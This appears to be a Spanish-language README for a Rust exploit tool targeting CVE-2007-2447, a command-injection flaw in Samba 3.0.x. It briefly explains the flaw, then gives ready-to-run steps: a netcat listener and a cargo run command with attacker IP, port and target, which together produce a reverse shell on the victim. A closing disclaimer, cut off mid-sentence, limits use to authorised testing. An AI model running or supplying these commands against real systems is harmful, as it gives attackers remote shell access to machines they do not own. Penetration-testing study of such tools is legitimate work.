
Una implementación independiente en Rust del exploit CVE-2007-2447 dirigido a Samba smbd 3.0.20-Debian.
Una implementación independiente en Rust del exploit CVE-2007-2447 dirigido a Samba smbd 3.0.20-Debian.
CVE-2007-2447 es una vulnerabilidad de inyección de comandos en las versiones de Samba 3.0.0 hasta 3.0.25rc3. La vulnerabilidad reside en la función SamrChangePassword(), que no sanea adecuadamente la entrada del usuario, lo que permite a los atacantes ejecutar comandos arbitrarios mediante metacaracteres de shell en el campo de nombre de usuario durante la autenticación SMB.
netcat disponible (normalmente instalado por defecto)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Set up a netcat listener
nc -lvnp 4444
# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: Dirección IP de tu máquina atacante--lport: Puerto para recibir la conexión de la shell inversa--target: Dirección IP de la máquina objetivoEsta herramienta es únicamente para fines educativos y de pruebas de penetración autorizadas. Úsala de forma responsable y solo en sistemas que poseas o para los que tengas permiso explícito para